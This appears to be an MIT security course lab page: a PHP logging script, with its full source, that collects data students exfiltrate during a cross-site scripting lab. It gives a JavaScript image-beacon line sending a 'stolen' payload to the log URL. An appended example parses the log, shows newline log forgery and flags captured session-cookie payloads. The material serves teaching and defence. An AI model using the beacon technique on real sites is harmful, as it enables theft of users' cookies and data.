You can use this server-side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload:
(new Image()).src='https://css.csail.mit.edu/6.858/2022/labs/log.php?' + 'id=my-username' + '&payload=some-string' + '&random=' + Math.random();
The random argument is ignored, but ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding.
If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.)
Below are the most recent logged entries, so that you can check if your attack worked:
In case you are curious, here is the source code of this page.
<?php
do {
    // Treat the request as a log submission only when "id" is present;
    // otherwise fall through to the HTML page below.
    if (!array_key_exists("id", $_REQUEST)) {
        break;
    }
    $id = $_REQUEST['id'];
    if (strlen($id) > 1000) {
        header("HTTP/1.0 413 Payload Too Large");
        echo "ID value is larger than 1000 bytes";
        return;
    }
    if (!array_key_exists("payload", $_REQUEST)) {
        header("HTTP/1.0 400 Bad Request");
        echo "No payload given";
        return;
    }
    $payload = $_REQUEST['payload'];
    if (empty($payload)) {
        header("HTTP/1.0 400 Bad Request");
        echo "Empty payload given";
        return;
    }
    if (strlen($payload) > 1000) {
        header("HTTP/1.0 413 Payload Too Large");
        echo "Payload is larger than 1000 bytes";
        return;
    }
    if (!function_exists('apcu_add')) {
        header("HTTP/1.0 501 Not Implemented");
        echo "APCu not enabled, so no rate limiting; refusing all requests";
        return;
    }
    // Rate limiting: apcu_add() fails if the key already exists, and the
    // key expires after 5 seconds.
    if (apcu_add($payload, true, 5) === false) {
        // exact same $payload was sent in the past 5 seconds
        header("HTTP/1.0 429 Too Many Requests");
        echo "That exact payload was sent very recently; rejecting";
        return;
    }
    // Replace CR/LF so that one request cannot add extra lines to the
    // line-oriented log.
    $payload = str_replace(array("\n", "\r"), '.', $payload);
    $id = str_replace(array("\n", "\r"), '.', $id);
    // "c+" opens for reading and writing, creating the file if needed,
    // without truncating it.
    $file = fopen("/tmp/6.858-logger.txt", "c+");
    if ($file === false) {
        header("HTTP/1.0 503 Service Unavailable");
        echo "Failed to open log file";
        return;
    }
    if (!flock($file, LOCK_EX)) {
        header("HTTP/1.0 503 Service Unavailable");
        echo "Failed to lock log file";
        return;
    }
    // Keep up to 100 existing lines, then rewrite the file with the new
    // entry first.
    $lines = array();
    while (!feof($file) && count($lines) < 100) {
        $lines[] = fgets($file);
    }
    ftruncate($file, 0);
    rewind($file);
    fwrite($file, date(DATE_RFC2822) . ": " . $id . ": " . $payload . "\n");
    foreach ($lines as &$line) {
        fwrite($file, $line);
    }
    flock($file, LOCK_UN);
    fclose($file);
    echo "Logged!";
    return;
} while(0);
$link = "(new Image()).src="
      . "'https://css.csail.mit.edu/6.858/2022/labs/log.php?'"
      . " + 'id=my-username'"
      . " + '&payload=some-string' + '&random='"
      . " + Math.random()";
?><!DOCTYPE html>
<html>
  <head>
    <link rel="stylesheet" type="text/css" href="labs.css" />
    <title>Lab 4 Logging Script</title>
  </head>
  <body>
    <h1>Lab 4 Logging Script</h1>
    <p>
      You can use this server side script to extract data from
      client-side JavaScript. For example, clicking this client-side
      hyperlink will cause the server to log the payload:
    </p>
    <pre class="tty"><a href="javascript:void(<?=$link;?>)"><?=$link;?>;</a></pre>
    <p>
      The random argument is ignored, but ensures that the browser
      bypasses its cache when downloading the image. We suggest that you
      use the random argument in your scripts as well. The ID argument
      will help you distinguish your log entries from those sent by other
      students; we suggest picking your MIT Athena username. Newlines are not
      allowed in <tt>javascript:</tt> links; if this bothers you, try
      <a href="https://meyerweb.com/eric/tools/dencoder/">URL encoding</a>.
    </p>
    <h2>Test form</h2>
    <p>
      If you just want to try out the script, you can use this form.
      (For your actual attacks in lab 4, you'll probably want to use the
      JavaScript image technique shown above.)
    </p>
    <form method="GET" action="">
      <label for="id">ID:</label><br />
      <input name="id" placeholder="your-mit-username" size="40" />
      <i>(some identifier to locate your payload in the log)</i>
      <br />
      <br />
      <label for="payload">Payload:</label><br />
      <input name="payload" placeholder="some-string" size="40" />
      <i>(the information you stole)</i>
      <br />
      <input type="submit" value="Log" name="log_submit" />
    </form>
    <h2>Logged entries</h2>
    <p>
      Below are the most recent logged entries, so that you can check
      if your attack worked:
    </p>
    <pre class="tty"><?php
      $lines = file_get_contents("/tmp/6.858-logger.txt");
      // Escape the log contents so logged payloads render as text, not markup.
      echo htmlspecialchars($lines);
    ?></pre>
    <h2>Source code</h2>
    <p>In case you are curious, here is the source code of this page.</p>
    <pre><?php highlight_file(__FILE__); ?></pre>
  </body>
</html>
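The script's `str_replace` on `\n` and `\r` is what keeps each request to exactly one line of the log. The JavaScript below is an added example, not part of the course's script: it models the `date: id: payload` line format, compares the log with and without that replacement, and flags payloads shaped like a session cookie. The function names, the sample values and the assumed cookie shape (`name=user#` followed by 32 hex characters) are constructed for illustration.

```javascript
// Added example: models the logger's "date: id: payload" line format.
// One log line: RFC 2822 date, then id, then payload, separated by ": ".
// The split is ambiguous if an id itself contains ": "; the first one wins.
const ENTRY = /^([A-Z][a-z]{2}, \d{2} [A-Z][a-z]{2} \d{4} \d{2}:\d{2}:\d{2} [+-]\d{4}): (.*?): (.*)$/;
// Assumed session-cookie shape: cookie-name=user#<32 hex chars>.
const SESSION = /^[A-Za-z0-9_]+=([^#\s]+)#[0-9a-f]{32}$/;

// Same neutralisation as the PHP str_replace: CR and LF become '.'.
function neutralise(s) {
  return s.replace(/[\r\n]/g, '.');
}

// Build one log line; sanitise=false shows the log without the replacement.
function formatEntry(date, id, payload, sanitise = true) {
  const f = sanitise ? neutralise : (s) => s;
  return `${date}: ${f(id)}: ${f(payload)}\n`;
}

// Parse log text into entries, skipping lines that do not match the format.
function parseLog(text) {
  const entries = [];
  for (const line of text.split('\n')) {
    const m = ENTRY.exec(line);
    if (m) entries.push({ date: m[1], id: m[2], payload: m[3] });
  }
  return entries;
}

// Report entries whose payload looks like a captured session cookie.
function flagSessionTokens(entries) {
  return entries
    .map((e) => ({ id: e.id, m: SESSION.exec(e.payload) }))
    .filter((x) => x.m)
    .map((x) => ({ id: x.id, user: x.m[1] }));
}

// Constructed sample inputs (not taken from the page's log).
const SAMPLE_DATE = 'Mon, 01 Jan 2024 12:00:00 -0500';
const FORGED = 'x\nMon, 01 Jan 2024 12:00:01 -0500: grader: all-clear';
const TOKEN = 'PyZoobarLogin=alice#0123456789abcdef0123456789abcdef';

const unsafeLog = formatEntry(SAMPLE_DATE, 'student1', FORGED, false);
const safeLog = formatEntry(SAMPLE_DATE, 'student1', FORGED);
console.log(parseLog(unsafeLog).length, parseLog(safeLog).length);
console.log(flagSessionTokens(parseLog(formatEntry(SAMPLE_DATE, 'student1', TOKEN))));
```

Without the replacement, one request yields two parsed entries, the second carrying an id the sender chose; with it, the embedded newline becomes `.` and the whole string stays in one entry's payload.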